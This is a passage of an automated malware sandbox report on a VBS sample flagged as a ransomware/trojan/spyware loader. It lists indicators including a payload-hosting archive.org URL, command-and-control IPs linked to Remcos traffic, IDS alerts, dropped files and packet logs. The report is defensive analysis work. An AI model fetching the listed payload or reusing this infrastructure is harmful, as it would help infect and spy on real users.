                  https://contoso.com/Iconpowershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://oneget.orgXpowershell.exe, 0000000A.00000002.1391003389.0000026F2EF56000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://ia600100.us.arXpowershell.exe, 0000000A.00000002.1391003389.0000026F2EE8A000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    https://ia600100.us.archive.orgpowershell.exe, 0000000A.00000002.1391003389.0000026F2EE8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2DA42000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    http://45.90.89.123powershell.exe, 0000000A.00000002.1391003389.0000026F2DC4A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://aka.ms/pscore68powershell.exe, 00000008.00000002.1454522210.000001EB02CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1454522210.000001EB02C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2D821000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt9uO;FIibase64Contentpowershell.exe, 0000000A.00000002.1391003389.0000026F2DA42000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.1454522210.000001EB02CCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2D821000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.1391003389.0000026F2F15A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://oneget.orgpowershell.exe, 0000000A.00000002.1391003389.0000026F2EF56000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://ia600100.us.archive.orgpowershell.exe, 0000000A.00000002.1391003389.0000026F2EF0E000.00000004.00000800.00020000.00000000.sdmpfalseunknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      45.90.89.123
                      		unknownBulgaria
                      		33657CMCSUStrue
                      45.90.89.98
                      		unknownBulgaria
                      		33657CMCSUStrue
                      207.241.227.240
                      		ia600100.us.archive.orgUnited States
                      		7941INTERNET-ARCHIVEUSfalse

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1523832
                      Start date and time:2024-10-02 05:28:25 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 52s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:16
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:5fKvwnCAeC.vbs
                      renamed because original name is a hash value
                      Original Sample Name:f47da41573231159283b297aee90e0265ae0b53812d508d59be4fd97e89bdd41.vbs
                      Detection:MAL
                      Classification:mal100.rans.troj.spyw.expl.evad.winVBS@8/6@1/3
                      EGA Information:
                      • Successful, ratio: 33.3%
                      HCA Information:
                      • Successful, ratio: 93%
                      • Number of executed functions: 41
                      • Number of non-executed functions: 209
                      Cookbook Comments:
                      • Found application associated with file extension: .vbs

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target powershell.exe, PID 7484 because it is empty
                      • Execution Graph export aborted for target powershell.exe, PID 8120 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      23:29:19API Interceptor46x Sleep call for process: powershell.exe modified
                      23:29:59API Interceptor2117020x Sleep call for process: RegAsm.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      45.90.89.123gcnmTxDXTo.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                      • 45.90.89.123/2117/RMCCF.txt
                      xnHel.rtfGet hashmaliciousRemcosBrowse
                      • 45.90.89.123/421/UNOST.txt
                      45.90.89.98AMG Cargo Logistic.docxGet hashmaliciousRemcosBrowse
                        factura proforma .docx.docGet hashmaliciousRemcosBrowse
                          AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                            gcnmTxDXTo.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                              17269374062ef5cc5f064187ae053742f15ea11eaf7fe116e75df3551c4709ce78e8f1419a932.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                1726170845fe5c472375696bf668b3b528e9effd5f9dfb1a2108bcc6e243a091f1afc5c794629.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                  xnHel.rtfGet hashmaliciousRemcosBrowse
                                    PO FT-151-2024 PETROMAT.xlsGet hashmaliciousRemcosBrowse
                                      August Shipment - Inv No. 041.xlsGet hashmaliciousRemcosBrowse
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                                          207.241.227.2401iH5ABLKIA.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                            aK7smea2Vv.vbsGet hashmaliciousPureLog StealerBrowse
                                              vr65co3Boo.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                f4576JaIo9.vbsGet hashmaliciousPureLog StealerBrowse
                                                  89SkYNNpdi.vbsGet hashmaliciousAveMaria, PrivateLoader, PureLog StealerBrowse
                                                    qiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                      ZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                                                        0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                                                          PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              ia600100.us.archive.org1iH5ABLKIA.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                              • 207.241.227.240
                                                              aK7smea2Vv.vbsGet hashmaliciousPureLog StealerBrowse
                                                              • 207.241.227.240
                                                              vr65co3Boo.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                              • 207.241.227.240
                                                              f4576JaIo9.vbsGet hashmaliciousPureLog StealerBrowse
                                                              • 207.241.227.240
                                                              89SkYNNpdi.vbsGet hashmaliciousAveMaria, PrivateLoader, PureLog StealerBrowse
                                                              • 207.241.227.240
                                                              qiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                              • 207.241.227.240
                                                              ZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                                                              • 207.241.227.240
                                                              0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                                                              • 207.241.227.240
                                                              PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 207.241.227.240
                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                                              • 207.241.227.240

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CMCSUSDeolane-Video-PDF.vbsGet hashmaliciousUnknownBrowse
                                                              • 45.89.247.53
                                                              Odeme_belgesi.exeGet hashmaliciousLokibotBrowse
                                                              • 45.66.231.242
                                                              m7DmyQOKD7.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                              • 45.66.231.126
                                                              AMG Cargo Logistic.docxGet hashmaliciousRemcosBrowse
                                                              • 45.90.89.98
                                                              factura proforma .docx.docGet hashmaliciousRemcosBrowse
                                                              • 45.90.89.98
                                                              SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exeGet hashmaliciousRemcosBrowse
                                                              • 45.66.231.90
                                                              l.exeGet hashmaliciousUnknownBrowse
                                                              • 45.66.231.185
                                                              winx86.exeGet hashmaliciousUnknownBrowse
                                                              • 45.66.231.185
                                                              AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                                              • 45.90.89.98
                                                              5qcJn1lfO5.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                              • 45.89.247.65
                                                              INTERNET-ARCHIVEUS1iH5ABLKIA.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                              • 207.241.227.240
                                                              aK7smea2Vv.vbsGet hashmaliciousPureLog StealerBrowse
                                                              • 207.241.227.240
                                                              vr65co3Boo.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                              • 207.241.227.240
                                                              f4576JaIo9.vbsGet hashmaliciousPureLog StealerBrowse
                                                              • 207.241.227.240
                                                              89SkYNNpdi.vbsGet hashmaliciousAveMaria, PrivateLoader, PureLog StealerBrowse
                                                              • 207.241.227.240
                                                              qiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                              • 207.241.227.240
                                                              ZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                                                              • 207.241.227.240
                                                              0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                                                              • 207.241.227.240
                                                              PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 207.241.227.240
                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                                              • 207.241.227.240
                                                              CMCSUSDeolane-Video-PDF.vbsGet hashmaliciousUnknownBrowse
                                                              • 45.89.247.53
                                                              Odeme_belgesi.exeGet hashmaliciousLokibotBrowse
                                                              • 45.66.231.242
                                                              m7DmyQOKD7.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                              • 45.66.231.126
                                                              AMG Cargo Logistic.docxGet hashmaliciousRemcosBrowse
                                                              • 45.90.89.98
                                                              factura proforma .docx.docGet hashmaliciousRemcosBrowse
                                                              • 45.90.89.98
                                                              SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exeGet hashmaliciousRemcosBrowse
                                                              • 45.66.231.90
                                                              l.exeGet hashmaliciousUnknownBrowse
                                                              • 45.66.231.185
                                                              winx86.exeGet hashmaliciousUnknownBrowse
                                                              • 45.66.231.185
                                                              AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                                              • 45.90.89.98
                                                              5qcJn1lfO5.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                              • 45.89.247.65

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              3b5074b1b5d032e5620f69f9f700ff0e1iH5ABLKIA.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                              • 207.241.227.240
                                                              uLfuBVyZFV.vbsGet hashmaliciousUnknownBrowse
                                                              • 207.241.227.240
                                                              aK7smea2Vv.vbsGet hashmaliciousPureLog StealerBrowse
                                                              • 207.241.227.240
                                                              vr65co3Boo.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                              • 207.241.227.240
                                                              f4576JaIo9.vbsGet hashmaliciousPureLog StealerBrowse
                                                              • 207.241.227.240
                                                              WW8kzvnphl.vbsGet hashmaliciousUnknownBrowse
                                                              • 207.241.227.240
                                                              89SkYNNpdi.vbsGet hashmaliciousAveMaria, PrivateLoader, PureLog StealerBrowse
                                                              • 207.241.227.240
                                                              qiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                              • 207.241.227.240
                                                              2THp7fwNQD.vbsGet hashmaliciousUnknownBrowse
                                                              • 207.241.227.240
                                                              iJEK0xwucj.vbsGet hashmaliciousUnknownBrowse
                                                              • 207.241.227.240

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):1.1940658735648508
                                                              Encrypted:false
                                                              SSDEEP:3:Nlllulh49//lz:NllUu9//
                                                              MD5:AADE84B9650AB09D8DC304B168D6D555
                                                              SHA1:17BC4180A60DBFF0B3F9BF8E5C5987D452D1D868
                                                              SHA-256:2C79C35AD1C4DFF21408F447C6AD565ACC3BDE8C8869108C8AA2F05B79539090
                                                              SHA-512:594C57CC7D421DD576EA05344E4EA8179D93295003638AD34A634BB5632B88DF65B7AEB52515E50CA060DA57F7BC6553C0193FF1931CB95D9BDEC3845779045D
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:@...e................................................@..........

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2amsj435.g4p.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1fn0441.lbk.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lcnlpz4b.zmu.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sedqkmkm.5pl.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\loat\logs.dat

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):144
                                                              Entropy (8bit):6.723642622925031
                                                              Encrypted:false
                                                              SSDEEP:3:9KVfpHGzVFx1pK9kbpqborWgY2BJKXvsnCXFblmmaxqjGdjeRJFIg429vx9Bnh:sBHGzZ1k9hborYmJuaCXFRRaw2a22l1h
                                                              MD5:DCF1DB117B36197409F895449AC386F0
                                                              SHA1:13EAA237AF3600BAF0313CA7434C03BAEA9051AD
                                                              SHA-256:A46C7C812A00D370A5FE4BCC1D52C07F3F3AC5FB2C316056AF15194BF182BBB6
                                                              SHA-512:A696E8027F3786A617CBF7E2296671CD509F3B3E03148AC22B871BFCA0447E7B7728C85DAF8A4BF36815F754240255422C928E0DD3B7647CC3D559A4233F70B6
                                                              Malicious:false
                                                              Preview:.=.........7.@..FL.X.y.v..$..C..>....IYn..E....4[.......r.I.Y..5f.'...>.LC.Z..?r.`kH...E;1M..yc8..d.8t3+ ......4.....Re.../.x......w.i.

                                                              Static File Info

                                                              General

                                                              File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Entropy (8bit):3.769827058226355
                                                              TrID:
                                                              • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                              • MP3 audio (1001/1) 32.22%
                                                              • Lumena CEL bitmap (63/63) 2.03%
                                                              • Corel Photo Paint (41/41) 1.32%
                                                              File name:5fKvwnCAeC.vbs
                                                              File size:290'064 bytes
                                                              MD5:0c6c4542c1abc5fc3d5eab3e4ab3793a
                                                              SHA1:288dfb240061530c2c73ae4183b7330623e94a69
                                                              SHA256:f47da41573231159283b297aee90e0265ae0b53812d508d59be4fd97e89bdd41
                                                              SHA512:7c3e22629060d8b18f1e88cbcb946d470599ac14699c75a7c1bf5cec0e174b8b3552eb6ec580defa747cb4cd5d9bfcc56e4ee9aa3dd366ed4272f88718ed8e2b
                                                              SSDEEP:6144:krHUuR5e0zLMcgGkkurXmTX/lb+rsb4Okiy+3kPvvA:kr0uR5e0nMc/kLrWTX/lb+rsb4Okiy47
                                                              TLSH:5854181225EA7008F1F32F575AF955F94F6BB9652A39821D644C0B0E1BE3E80CE51BB3
                                                              File Content Preview:..W.Z.x.N.W.m.n.i.k.G.p.v.W.o.K.q.O.c.k.B.L.K.i.U.Z.i.L.L.p.m. .=. .".i.b.b.K.e.G.e.R.W.r.B.c.U.e.B.W.N.c.W.h.m.L.I.C.R.f.n.o.K.P.".....e.O.L.W.T.L.a.i.o.z.c.z.d.k.Z.I.P.L.t.o.o.G.L.q.p.m.G.e.R.W. .=. .".L.g.c.W.q.k.N.g.h.R.o.L.U.i.r.a.R.K.K.A.P.G.d.n.g.z

                                                              File Icon

                                                              Icon Hash:68d69b8f86ab9a86

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-10-02T05:29:12.457573+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.106090145.90.89.988243TCP
                                                              2024-10-02T05:29:27.935861+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1145.90.89.12380192.168.2.1049707TCP
                                                              2024-10-02T05:29:27.935861+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1145.90.89.12380192.168.2.1049707TCP
                                                              2024-10-02T05:29:50.329695+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.104970845.90.89.988243TCP
                                                              2024-10-02T05:30:12.684380+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.104971345.90.89.988243TCP
                                                              2024-10-02T05:30:35.061345+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.106089845.90.89.988243TCP
                                                              2024-10-02T05:30:57.500976+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.106089945.90.89.988243TCP
                                                              2024-10-02T05:31:19.894305+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.106090045.90.89.988243TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 2, 2024 05:29:21.210912943 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:21.210962057 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:21.211045980 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:21.226649046 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:21.226667881 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:21.852826118 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:21.852957010 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:21.899665117 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:21.899687052 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:21.900089025 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:21.957665920 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:21.968733072 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.015399933 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.221060038 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.221100092 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.221110106 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.221141100 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.221155882 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.221163988 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.221220970 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.221235991 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.221271992 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.221327066 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.247847080 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.247869015 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.248167992 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.248178005 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.248234034 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.287326097 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.287349939 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.287476063 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.287486076 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.287560940 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.339250088 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.339272976 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.339413881 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.339427948 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.339483976 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.340846062 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.340862036 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.340928078 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.340934992 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.340992928 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.354022026 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.354038954 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.354116917 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.354125977 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.354178905 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.405663967 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.405683994 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.405920029 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.405934095 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.405988932 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.431881905 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.431906939 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.432001114 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.432010889 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.432065964 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.433219910 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.433262110 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.433289051 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.433301926 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.433346033 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.433346033 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.434283018 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.434313059 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.434364080 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.434370995 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.434433937 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.434433937 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.485790968 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.485817909 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.486067057 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.486080885 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.486159086 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:22.487952948 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.487976074 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.488030910 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:22.488111973 CEST49706443192.168.2.10207.241.227.240
